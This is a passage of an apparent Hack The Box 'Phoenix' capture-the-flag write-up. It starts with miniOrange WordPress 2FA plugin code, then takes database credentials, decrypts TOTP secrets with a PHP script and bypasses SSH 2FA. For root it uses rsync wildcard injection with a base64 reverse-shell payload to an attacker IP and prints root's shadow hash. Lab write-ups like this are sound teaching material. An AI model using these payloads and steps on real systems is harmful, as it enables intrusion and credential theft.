$mo2f_rba_status_sessionUuid = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_sessionUuid' );
$mo2f_rba_status_decision_flag = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_decision_flag' );
$cookie_value = array(
"status" => $mo2f_rba_status_status,
"sessionUuid" => $mo2f_rba_status_sessionUuid,
"decision_flag" => $mo2f_rba_status_decision_flag
);
}
} else if ( $variable == 'mo_2_factor_kba_questions' ) {
if ( isset( $_COOKIE['kba_question1'] ) && ! empty( $_COOKIE['kba_question1'] ) ) {

$kba_question1['question'] = MO2f_Utility::mo2f_get_cookie_values( 'kba_question1' );
$kba_question2['question'] = MO2f_Utility::mo2f_get_cookie_values( 'kba_question2' );
$cookie_value = array( $kba_question1, $kba_question2 );
}
} else {
$cookie_value = MO2f_Utility::mo2f_get_cookie_values( $variable );
}
if($cookie_value){
return $cookie_value;
} else {
$session_id = MO2f_Utility::decrypt_data( $session_id, $key );
$db_value = $Mo2fdbQueries->get_user_login_details( $variable, $session_id );
if ( in_array( $variable, array( "mo2f_rba_status", "mo_2_factor_kba_questions" ) ) ) {
$db_value = unserialize( $db_value );
}
return $db_value;
}
}
}else if (!empty($data_option) && $data_option=="sessions"){
if ( isset( $_SESSION[ $variable ] ) && ! empty( $_SESSION[ $variable ] ) ) {
return $_SESSION[ $variable ];
}
}else if (!empty($data_option) && $data_option=="cookies"){
$key = get_option( 'mo2f_encryption_key' );
$cookie_value = false;

if ( $variable == 'mo2f_rba_status' ) {
if ( isset( $_COOKIE['mo2f_rba_status_status'] ) && ! empty( $_COOKIE['mo2f_rba_status_status'] ) ) {
$mo2f_rba_status_status = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_status' );
$mo2f_rba_status_sessionUuid = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_sessionUuid' );
$mo2f_rba_status_decision_flag = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_decision_flag' );

$cookie_value = array(
"status" => $mo2f_rba_status_status,
"sessionUuid" => $mo2f_rba_status_sessionUuid,
"decision_flag" => $mo2f_rba_status_decision_flag
);
}

} else if ( $variable == 'mo_2_factor_kba_questions' ) {

if ( isset( $_COOKIE['kba_question1'] ) && ! empty( $_COOKIE['kba_question1'] ) ) {
$kba_question1 = MO2f_Utility::mo2f_get_cookie_values( 'kba_question1' );
$kba_question2 = MO2f_Utility::mo2f_get_cookie_values( 'kba_question2' );


$cookie_value = array( $kba_question1, $kba_question2 );
}

} else {
$cookie_value = MO2f_Utility::mo2f_get_cookie_values( $variable );
}

if($cookie_value){
return $cookie_value;
}
}else if (!empty($data_option) && $data_option=="tables"){
$key = get_option( 'mo2f_encryption_key' );
$session_id = MO2f_Utility::decrypt_data( $session_id, $key );
$db_value = $Mo2fdbQueries->get_user_login_details( $variable, $session_id );
if ( in_array( $variable, array( "mo2f_rba_status", "mo_2_factor_kba_questions" ) ) ) {
$db_value = unserialize( $db_value );
}
return $db_value;
}
}

/**
* The function gets the cookie value after decoding and decryption.
*
* @param string $cookiename - the cookie name
*
* @return string
*/
public static function mo2f_get_cookie_values( $cookiename ) {

$key = get_option( 'mo2f_encryption_key' );
if ( isset( $_COOKIE[ $cookiename ] ) ) {
$decrypted_data = MO2f_Utility::decrypt_data( base64_decode( $_COOKIE[ $cookiename ] ), $key );

if(MO2f_Utility::isJSON($decrypted_data))
$decrypted_data = json_decode($decrypted_data);

if ( $decrypted_data ) {
$decrypted_data_array = explode( '&', $decrypted_data );

$cookie_value = $decrypted_data_array[0];
if(sizeof($decrypted_data_array) == 2 ){
$cookie_creation_time = new DateTime( $decrypted_data_array[1] );
}else{
$cookie_creation_time = new DateTime( array_pop($decrypted_data_array) );
$cookie_value = implode('&', $decrypted_data_array);
}
$current_time = new DateTime( 'now' );

$interval = $cookie_creation_time->diff( $current_time );
$minutes = $interval->format( '%i' );

$is_cookie_valid = $minutes <= 5 ? true : false;

return $is_cookie_valid ? $cookie_value : false;

} else {
return false;
}
} else {
return false;
}
}

public static function isJSON($string){
return is_string($string) && is_array(json_decode($string, true)) ? true : false;
}
/**
* The function sets the cookie value after encryption and encoding.
*
* @param string $cookiename - the cookie name
* @param string $cookievalue - the cookie value to be set
*
* @return string
*/
public static function mo2f_set_cookie_values( $cookiename, $cookievalue ) {

$key = get_option( 'mo2f_encryption_key' );

$current_time = new DateTime( 'now' );
$current_time = $current_time->format( 'Y-m-d H:i:sP' );
$cookievalue = $cookievalue . '&' . $current_time;

$cookievalue_encrypted = MO2f_Utility::encrypt_data( $cookievalue, $key );
// setcookie( $cookiename, base64_encode( $cookievalue_encrypted ) );
// setcookie( $cookiename, base64_encode( $cookievalue_encrypted ),NULL,NULL,NULL,NULL, TRUE );
$_COOKIE[$cookiename] = base64_encode( $cookievalue_encrypted );
}

/**
* @param string $data - the key=value pairs separated with &
*
* @return string
*/
public static function encrypt_data( $data, $key ) {
$plaintext = $data;
$ivlen = openssl_cipher_iv_length($cipher="AES-128-CBC");
$iv = openssl_random_pseudo_bytes($ivlen);
$ciphertext_raw = openssl_encrypt($plaintext, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv);
$hmac = hash_hmac('sha256', $ciphertext_raw, $key, $as_binary=true);
$ciphertext = base64_encode( $iv.$hmac.$ciphertext_raw );
return $ciphertext;
}

/**
* The function unsets the session variables passed.
*
* @param array $variables - the array of session variables to be unset
*
* @return NA
*/
public static function unset_session_variables( $variables ) {
if ( gettype( $variables ) == "array" ) {
foreach ( $variables as $variable ) {
if ( isset( $_SESSION[ $variable ] ) ) {
unset( $_SESSION[ $variable ] );
}
}
} else {
if ( isset( $_SESSION[ $variables ] ) ) {
unset( $_SESSION[ $variables ] );
}
}
}

/**
* The function unsets the cookie variables passed.
*
* @param array $variables - the array of cookie variables to be unset
*
* @return NA
*/
public static function unset_cookie_variables( $variables ) {

if ( gettype( $variables ) == "array" ) {
foreach ( $variables as $variable ) {
if ( isset( $_COOKIE[ $variable ] ) ) {
setcookie( $variable, '', time() - 3600,NULL,NULL,NULL, TRUE );
}
}
} else {
if ( isset( $_COOKIE[ $variables ] ) ) {
setcookie( $variables, '', time() - 3600,NULL,NULL,NULL, TRUE );
}
}

}

/**
* The function unsets the temp table variables passed.
*
* @param array $variables - the array of temporary table variables to be unset
* @param string $session_id - the session_id for which it should be destroyed
*
* @return NA
*/
public static function unset_temp_user_details_in_table( $variables, $session_id, $command='' ) {
global $Mo2fdbQueries;
$key = get_option( 'mo2f_encryption_key' );
$session_id = MO2f_Utility::decrypt_data( $session_id, $key );
if($command == "destroy"){
$Mo2fdbQueries->delete_user_login_sessions( $session_id );
}else{
$Mo2fdbQueries->save_user_login_details( $session_id, array($variables => ''));
}
}



/**
* The function decodes the twofactor methods
*
* @param array $variables - the selected 2-factor method and the decode type.
*
* @return NA
*/
public static function mo2f_decode_2_factor( $selected_2_factor_method, $decode_type ) {

if ( $selected_2_factor_method == 'NONE' ) {
return $selected_2_factor_method;
}else if($selected_2_factor_method == "OTP Over Email")
{
$selected_2_factor_method = "OTPOverEmail";
}


$wpdb_2fa_methods = array(
"miniOrangeQRCodeAuthentication" => "miniOrange QR Code Authentication",
"miniOrangeSoftToken" => "miniOrange Soft Token",
"miniOrangePushNotification" => "miniOrange Push Notification",
"GoogleAuthenticator" => "Google Authenticator",
"AuthyAuthenticator" => "Authy Authenticator",
"SecurityQuestions" => "Security Questions",
"EmailVerification" => "Email Verification",
"OTPOverSMS" => "OTP Over SMS",
"OTPOverEmail" => "OTP Over Email",
"DuoAuthenticator" => "Duo Authenticator"
);

$server_2fa_methods = array(
"miniOrange QR Code Authentication" => "MOBILE AUTHENTICATION",
"miniOrange Soft Token" => "SOFT TOKEN",
"miniOrange Push Notification" => "PUSH NOTIFICATIONS",
"Google Authenticator" => "GOOGLE AUTHENTICATOR",
"Authy Authenticator" => "GOOGLE AUTHENTICATOR",
"Security Questions" => "KBA",
"Email Verification" => "OUT OF BAND EMAIL",
"OTP Over SMS" => "SMS",
"EMAIL" => "OTP Over Email",
"OTPOverEmail" => "OTP Over Email",
"Duo Authenticator" => "Duo Authenticator",
"DUO AUTHENTICATOR" => "Duo Authenticator",
"OTP Over Email" => "EMAIL",
"OTP OVER EMAIL" => "EMAIL"

);

$server_to_wpdb_2fa_methods = array(
"MOBILE AUTHENTICATION" => "miniOrange QR Code Authentication",
"SOFT TOKEN" => "miniOrange Soft Token",
"PUSH NOTIFICATIONS" => "miniOrange Push Notification",
"GOOGLE AUTHENTICATOR" => "Google Authenticator",
"KBA" => "Security Questions",
"OUT OF BAND EMAIL" => "Email Verification",
"SMS" => "OTP Over SMS",
"EMAIL" => "OTP Over Email",
"OTPOverEmail" => "OTP Over Email",
"OTP OVER EMAIL" => "OTP Over Email",
"OTP Over SMS" => "OTP Over SMS",
"Security Questions" => "Security Questions",
"Google Authenticator" => "Google Authenticator"
);

$methodname='';
if ( $decode_type == "wpdb" ) {
$methodname = isset($wpdb_2fa_methods[ $selected_2_factor_method ])?$wpdb_2fa_methods[ $selected_2_factor_method ]:$selected_2_factor_method;
} else if ( $decode_type == "server" ) {
$methodname = isset($server_2fa_methods[ $selected_2_factor_method ])?$server_2fa_methods[ $selected_2_factor_method ]:$selected_2_factor_method;
} else {
$methodname = isset($server_to_wpdb_2fa_methods[ $selected_2_factor_method ])?$server_to_wpdb_2fa_methods[ $selected_2_factor_method ]:$selected_2_factor_method;
}
return $methodname;

}
public static function is_same_method($method,$current_method){
if($method == $current_method || $method == MO2f_Utility::mo2f_decode_2_factor($current_method,'wpdb') || $method == MO2f_Utility::mo2f_decode_2_factor($current_method,'') || MO2f_Utility::mo2f_decode_2_factor($current_method,'server') == $method)
return true;
return false;
}

public static function get_plugin_name_by_identifier( $plugin_identitifier ){
$all_plugins = get_plugins();
$plugin_details = $all_plugins[$plugin_identitifier];

return $plugin_details["Name"] ? $plugin_details["Name"] : "No Plugin selected" ;
}

public static function isBlank($value)
{
if (!isset($value) || empty($value)) return TRUE;
return FALSE;
}

public static function get_index_value($var,$index){
switch ($var) {
case 'GLOBALS':
return isset($GLOBALS[$index])?$GLOBALS[$index]:false;
break;

default:
return false;
break;
}
}

public static function get_codes_email_content($codes){
$message = '<table cellpadding="25" style="margin:0px auto">
<tbody>
<tr>
<td>
<table cellpadding="24" width="584px" style="margin:0 auto;max-width:584px;background-color:#f6f4f4;border:1px solid #a8adad">
<tbody>
<tr>
<td><img src="https://ci5.googleusercontent.com/proxy/10EQeM1udyBOkfD2dwxGhIaMXV4lOwCRtUecpsDkZISL0JIkOL2JhaYhVp54q6Sk656rW2rpAFJFEgGQiAOVcYIIKxXYMHHMNSNB=s0-d-e1-ft#https://login.xecurify.com/moas/images/xecurify-logo.png" style="color:#5fb336;text-decoration:none;display:block;width:auto;height:auto;max-height:35px" class="CToWUd"></td>
</tr>
</tbody>
</table>
<table cellpadding="24" style="background:#fff;border:1px solid #a8adad;width:584px;border-top:none;color:#4d4b48;font-family:Arial,Helvetica,sans-serif;font-size:13px;line-height:18px">
<tbody>
<tr>
<td>
<p style="margin-top:0;margin-bottom:20px">Dear Customer,</p>
<p style="margin-top:0;margin-bottom:10px">You initiated a transaction from <b>WordPress 2 Factor Authentication Plugin</b>:</p>
<p style="margin-top:0;margin-bottom:10px">Your backup codes are:-
<table cellspacing="10">
<tr>';
for ($x = 0; $x < sizeof($codes); $x++) {
$message = $message.'<td>'.$codes[$x].'</td>';

}
$message = $message.'</table></p>
<p style="margin-top:0;margin-bottom:10px">Please use this carefully as each code can only be used once. Please do not share these codes with anyone.</p>
<p style="margin-top:0;margin-bottom:10px">Also, we would highly recommend you to reconfigure your two-factor after logging in.</p>
<p style="margin-top:0;margin-bottom:15px">Thank you,<br>miniOrange Team</p>
<p style="margin-top:0;margin-bottom:0px;font-size:11px">Disclaimer: This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed.</p>
</div></div></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>';
return $message;
}

public static function get_codes_warning_email_content($codes_remaining){
$message = '<table cellpadding="25" style="margin:0px auto">
<tbody>
<tr>
<td>
<table cellpadding="24" width="584px" style="margin:0 auto;max-width:584px;background-color:#f6f4f4;border:1px solid #a8adad">
<tbody>
<tr>
<td><img src="https://ci5.googleusercontent.com/proxy/10EQeM1udyBOkfD2dwxGhIaMXV4lOwCRtUecpsDkZISL0JIkOL2JhaYhVp54q6Sk656rW2rpAFJFEgGQiAOVcYIIKxXYMHHMNSNB=s0-d-e1-ft#https://login.xecurify.com/moas/images/xecurify-logo.png" style="color:#5fb336;text-decoration:none;display:block;width:auto;height:auto;max-height:35px" class="CToWUd"></td>
</tr>
</tbody>
</table>
<table cellpadding="24" style="background:#fff;border:1px solid #a8adad;width:584px;border-top:none;color:#4d4b48;font-family:Arial,Helvetica,sans-serif;font-size:13px;line-height:18px">
<tbody>
<tr>
<td>
<p style="margin-top:0;margin-bottom:20px">Dear Customer,</p>
<p style="margin-top:0;margin-bottom:10px">You have '.$codes_remaining.' backup codes remaining. Kindly reconfigure your two-factor to avoid being locked out.</b></p>
<p style="margin-top:0;margin-bottom:15px">Thank you,<br>miniOrange Team</p>
<p style="margin-top:0;margin-bottom:0px;font-size:11px">Disclaimer: This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed.</p>
</div></div></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>';
return $message;
}

public static function mo2f_get_codes_hash($codes){
$codes_hash=array();
for ($x = 0; $x < sizeof($codes); $x++) {
$str = $codes[$x];
array_push($codes_hash,md5($str));
}
return $codes_hash;
}

public static function mo2f_email_backup_codes($codes, $mo2f_user_email){
$subject = '2-Factor Authentication(Backup Codes)';
$headers = array('Content-Type: text/html; charset=UTF-8');
$message = MO2f_Utility::get_codes_email_content($codes);
$result = wp_mail($mo2f_user_email,$subject,$message,$headers);
return $result;
}

public static function mo2f_download_backup_codes($id, $codes){
update_user_meta($id, 'mo_backup_code_downloaded', 1);
header('Content-Disposition: attachment; filename=miniOrange2-factor-BackupCodes.txt');
echo "Two Factor Backup Codes:".PHP_EOL.PHP_EOL;
echo "These are the codes that can be used in case you lose your phone or cannot access your email. Please reconfigure your authentication method after login.".PHP_EOL."Please use this carefully as each code can only be used once. Please do not share these codes with anyone..".PHP_EOL.PHP_EOL;
for ($x = 0; $x < sizeof($codes); $x++){
$str1= $codes[$x];
echo(($x+1).". ".$str1." ");
}

exit;
}

public static function mo2f_debug_file($text){
if(MoWpnsUtility::get_mo2f_db_option('mo2f_enable_debug_log', 'site_option') == 1){
$debug_log_path = wp_upload_dir();
$debug_log_path = $debug_log_path['basedir'].DIRECTORY_SEPARATOR;
$filename = 'miniorange_debug_log.txt';
$data = '[' . date("Y/m/d").' '. time().']:'.$text."\n";
$handle = fopen($debug_log_path.DIRECTORY_SEPARATOR.$filename,'a+');
fwrite($handle,$data);
fclose($handle);
}
}


public static function mo2f_mail_and_download_codes(){
global $Mo2fdbQueries;

$id = get_current_user_id();
$mo2f_user_email = $Mo2fdbQueries->get_user_detail( 'mo2f_user_email', $id );
if(empty($mo2f_user_email)){
$currentuser = get_user_by( 'id', $id );
$mo2f_user_email = $currentuser->user_email;
}
$generate_backup_code = new Customer_Cloud_Setup();
$codes=$generate_backup_code->mo_2f_generate_backup_codes($mo2f_user_email, site_url());

if($codes == 'LimitReached'|| $codes == 'UserLimitReached' || $codes == 'AllUsed' || $codes == 'invalid_request')
return $codes;

$codes = explode(' ', $codes);
$codes_hash=MO2f_Utility::mo2f_get_codes_hash($codes);
$result = MO2f_Utility::mo2f_email_backup_codes($codes, $mo2f_user_email);
update_user_meta($id, 'mo_backup_code_generated', 1);
update_user_meta($id, 'mo_backup_code_downloaded', 1);
MO2f_Utility::mo2f_download_backup_codes($id, $codes);
}


}

?>

then We can grab the wordpress login from the wp-config.php file:

1
2
3
4
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', '<++32%himself%FIRM%section%32++>' );
define( 'DB_HOST', 'localhost:/var/run/mysqld/mysqld.sock' );

then connect to mysql to get more information:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
wp_user@phoenix:/$ mysql -uwordpress -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2823
Server version: 8.0.28-0ubuntu0.20.04.3 (Ubuntu)

Copyright (c) 2000, 2022, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select meta_value from wp_usermeta WHERE meta_key IN ('mo2f_gauth_key');
+--------------------------------------------------------------------------------------------------------------+
| meta_value |
+--------------------------------------------------------------------------------------------------------------+
| qGEPwI6RQBxF4aXM6PVuriofiwCH4mjc4ZjO3jWN5gDDX5MzLHTfDk3tRGK7vwkkTbAjoxNfqFeMjJZoSI5yPF25Hd5b8lSaF/Dpc6WMBTA= |
| mFeor0xmxMGd4ncJhPAuPGM6HXap6neH469PGQ2wVj23TuAYSULMTQTnQcH4SgnaO7BVPok5rTc4vqxYMYZCFNJC35KeyByT3cF05m27lvI= |
+--------------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)

mysql> select meta_value from wp_usermeta WHERE meta_key IN ('mo2f_get_auth_rnd_string');
+------------+
| meta_value |
+------------+
| kHHxxX3f |
| M6EwACNR |
+------------+
2 rows in set (0.00 sec)

and then easily write an decrypt exp php file to get the key:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
function decrypt_data($data, $key) {
$c = base64_decode($data);
$ivlen = openssl_cipher_iv_length($cipher="AES-128-CBC");
$iv = substr($c, 0, $ivlen);
$hmac = substr($c, $ivlen, $sha2len=32);
$ciphertext_raw = substr($c, $ivlen+$sha2len);
$original_plaintext = openssl_decrypt($ciphertext_raw, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv);
$calcmac = hash_hmac('sha256', $ciphertext_raw, $key, $as_binary=true);


return $original_plaintext;
}
echo decrypt_data("qGEPwI6RQBxF4aXM6PVuriofiwCH4mjc4ZjO3jWN5gDDX5MzLHTfDk3tRGK7vwkkTbAjoxNfqFeMjJZoSI5yPF25Hd5b8lSaF/Dpc6WMBTA=","kHHxxX3f");
?>
1
2
3
┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# php exp.php
PDEEWIVJSIDWS6WO

then we can use OPT dynamic code to login:

but login is no use for later movement, we just need to known there is a way to this

User own

We can completely bypass the 2FA by renaming the plugin over at /opt/wordpress/ but it doesn’t get us much further than we already are.

Instead back to using SSH, we can look into bypassing the 2FA completely (for ssh this time, not wordpress), in the /etc/pam.d/ssh config, we see reference to an accessfile:

read more about it:

  • pam_google_authenticator
1
2
3
4
5
auth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access-local.conf

wp_user@phoenix:~/wordpress$ cat /etc/security/access-local.conf
+ : ALL : 10.11.12.13/24
- : ALL : ALL

We need to connect from an IP on the 10.11.2.13/24 subnet, which we can’t do from our machine or locally from the other machine. so we use ssh command in the wp_user shell:

We finally SSH over to the box, reusing editor‘s password:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
wp_user@phoenix:~/wordpress$ ssh editor@10.11.12.13
$$$$$$$\ $$\ $$\
$$ __$$\ $$ | \__|
$$ | $$ |$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$\ $$\ $$\ $$\
$$$$$$$ |$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ |\$$\ $$ |
$$ ____/ $$ | $$ |$$ / $$ |$$$$$$$$ |$$ | $$ |$$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ $$<
$$ | $$ | $$ |\$$$$$$ |\$$$$$$$\ $$ | $$ |$$ |$$ /\$$\
\__| \__| \__| \______/ \_______|\__| \__|\__|\__/ \__|
Password: superphoenix
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu 24 Mar 2022 07:03:51 AM UTC

System load: 0.0
Usage of /: 70.3% of 4.36GB
Memory usage: 26%
Swap usage: 0%
Processes: 244
Users logged in: 0
IPv4 address for ens160: 10.10.11.149
IPv6 address for ens160: dead:beef::250:56ff:feb9:ce55
IPv4 address for eth0: 10.11.12.13


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Mar 23 18:41:06 2022 from 10.11.12.13
editor@phoenix:~$ id
uid=1002(editor) gid=1002(editor) groups=1002(editor)
editor@phoenix:~$ whoami
editor
editor@phoenix:~$ cat user.txt
8c36b4a1e1ba0a43169f10a1d0975fee

Root own

we found a cron job file in

1
2
editor@phoenix:/dev/shm$ find /usr/local/bin/ -perm -o=x -type f 2>/dev/null
/usr/local/bin/cron.sh.x

We can run pspy however we can’t see processes from other users. Enumerating the box more, we find cron.sh.x, if we run this manually and see what it’s doing:

1
2
3
4
5
6
7
8
2022/03/23 19:15:04 CMD: UID=1002 PID=50487  | /usr/local/bin/cron.sh.x -c exec '/usr/local/bin/cron.sh.x' "$@" /usr/local/bin/cron.sh.x
2022/03/23 19:15:04 CMD: UID=1002 PID=50489 | mysqldump -u root wordpress
2022/03/23 19:15:04 CMD: UID=1002 PID=50490 | tar -cf phoenix.htb.2022-03-23-19-15.tar dbbackup.sql
2022/03/23 19:15:04 CMD: UID=1002 PID=50491 | rm dbbackup.sql
2022/03/23 19:15:04 CMD: UID=1002 PID=50492 | gzip -9 phoenix.htb.2022-03-23-19-15.tar
2022/03/23 19:15:20 CMD: UID=1002 PID=50493 | find . -type f -mmin +30 -delete
2022/03/23 19:15:20 CMD: UID=1002 PID=50494 | rsync --ignore-existing -t phoenix.htb.2022-03-23-18-48.tar.gz phoenix.htb.2022-03-23-18-51.tar.gz phoenix.htb.2022-03-23-18-54.tar.gz phoenix.htb.2022-03-23-18-57.tar.gz phoenix.htb.2022-03-23-19-00.tar.gz phoenix.htb.2022-03-23-19-03.tar.gz phoenix.htb.2022-03-23-19-05.tar.gz phoenix.htb.2022-03-23-19-06.tar.gz phoenix.htb.2022-03-23-19-09.tar.gz phoenix.htb.2022-03-23-19-12.tar.gz phoenix.htb.2022-03-23-19-15.tar.gz jit@10.11.12.14:/backups/
2022/03/23 19:15:20 CMD: UID=1002 PID=50495 | ssh -l jit 10.11.12.14 rsync --server -te.LsfxC --ignore-existing . /backups/

It seems to use a few wild cards. We can try exploit this line:

1
rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/

We can see some article here:

  • gtfobins-rsync

  • Wildcards Spare tricks

We can create 2 files in /backups to exploit this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
echo "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEwLzEyMzQgMD4mMQ==|base64 -d|bash" > shell.sh

touch -- "-e sh shell.sh"

editor@phoenix:/backups$ chmod +x shell.sh
editor@phoenix:/backups$ chmod +x -- '-e sh shell.sh'
editor@phoenix:/backups$ ls -la
total 5300
drwxr-x--- 2 editor editor 4096 Mar 23 19:39 .
drwxr-xr-x 20 root root 4096 Feb 25 19:40 ..
-rwxrwxr-x 1 editor editor 0 Mar 23 19:38 '-e sh shell.sh'
-rw-r--r-- 1 root root 675305 Mar 23 19:12 phoenix.htb.2022-03-23-19-12.tar.gz
-rw-rw-r-- 1 editor editor 151 Mar 23 19:15 phoenix.htb.2022-03-23-19-15.tar.gz
-rw-r--r-- 1 root root 675308 Mar 23 19:18 phoenix.htb.2022-03-23-19-18.tar.gz
-rw-r--r-- 1 root root 675308 Mar 23 19:21 phoenix.htb.2022-03-23-19-21.tar.gz
-rw-r--r-- 1 root root 675303 Mar 23 19:24 phoenix.htb.2022-03-23-19-24.tar.gz
-rw-rw-r-- 1 editor editor 152 Mar 23 19:27 phoenix.htb.2022-03-23-19-27.tar.gz
-rw-r--r-- 1 root root 675307 Mar 23 19:30 phoenix.htb.2022-03-23-19-30.tar.gz
-rw-r--r-- 1 root root 675307 Mar 23 19:33 phoenix.htb.2022-03-23-19-33.tar.gz
-rw-r--r-- 1 root root 675308 Mar 23 19:36 phoenix.htb.2022-03-23-19-36.tar.gz
-rw-r--r-- 1 root root 675308 Mar 23 19:39 phoenix.htb.2022-03-23-19-39.tar.gz
-rwxrwxr-x 1 editor editor 85 Mar 23 19:39 shell.sh

after 3 minutes, we got a root shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# nc -lvp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.11.149.
Ncat: Connection from 10.10.11.149:34274.
bash: cannot set terminal process group (50726): Inappropriate ioctl for device
bash: no job control in this shell
root@phoenix:/backups# cat /root/root.txt
cat /root/root.txt
258b721224d4a73b09b555077a962004
root@phoenix:/backups# cat /etc/shadow | grep root
cat /etc/shadow | grep root
root:$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0:18944:0:99999:7:::

Summary of knowledge

  • wordpress enumeration
  • Asgaros Forum < 2.0.0 plugin - Subscriber+ Blind SQL Injection
  • john crack wordpress hash
  • Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload to get shell
  • OPT KEY decrypt
  • bypass linux 2FA
  • use cron job file rsync process to privesc

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…